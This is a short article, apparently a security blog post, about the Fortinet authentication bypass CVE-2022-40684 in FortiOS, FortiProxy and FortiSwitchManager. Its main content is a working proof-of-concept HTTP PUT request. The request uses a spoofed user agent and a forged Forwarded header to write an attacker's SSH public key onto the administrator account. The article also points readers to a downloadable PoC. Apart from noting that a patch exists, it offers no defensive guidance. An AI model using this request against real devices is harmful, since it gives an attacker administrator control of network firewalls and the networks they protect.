New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager

Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684).
This vulnerability could allow an attacker to log on as an administrator on an affected system.

In this article, using FortiOS version 7.2.1 as an example, we will demonstrate how attackers do it.

PoC

Let’s take a look at the inner workings of this vulnerability. The vulnerability is exploited below to add an SSH key to an administrator user, allowing an attacker to log into the affected system via SSH as an administrator.

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 Host: 192.168.10.66 User-Agent: Report Runner Content-Type: application/json Forwarded: for=”[127.0.0.1]:8000″;by=”[127.0.0.1]:9000″; Content-Length: 606 { “ssh-public-key1”: “\”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChuU209LX1lleXNEkFkyUsuvFTgNB7kPtPHuO0aZeJ6XBUASECf/iNLpGnrEwTc/qUiBHOUGBkunCbx7bpk8bTcQtiTSAfbL2zeA9sxiSzxUrtmW1V0if7TG4cvEJc6dli3v9cjG/PUnbZv1ej0/NPqPCc8qAC/rdWQXZ2+aHy/RTpLqQHrcJ3hJP6fST8HMSEVbA8H2SFnGZn8tX9bXmYuFuEArBvg/Fboc8rFTTd6S3GQtaCrBqJ5uJ+D9bg7hqxZp9qqsU+751gxFsxVaE7fAH45pTD/Wvv+U+APLq/N7VjAqKn3pmyLun+qT+ib72Xors8DWlAqSMRmkvjg/BdFeU/ucRqs+FbJVKAhxiN/qJIZmR8VfpcK4grkefrko/eXfrM5qdHKAE1zc5+oNB9CmjyrrFzIXVTTPYl8+6q0YjifT8CP72tgghfXUZzFp3WhsiGQJSVNrOh97lnCh4nrArYUniL7ac5Q415IT8AilnDArjJ/wFMhaTgftUo878= [email protected]\”” }

You can download POC here

Thanks to HORIZON3.ai for the POC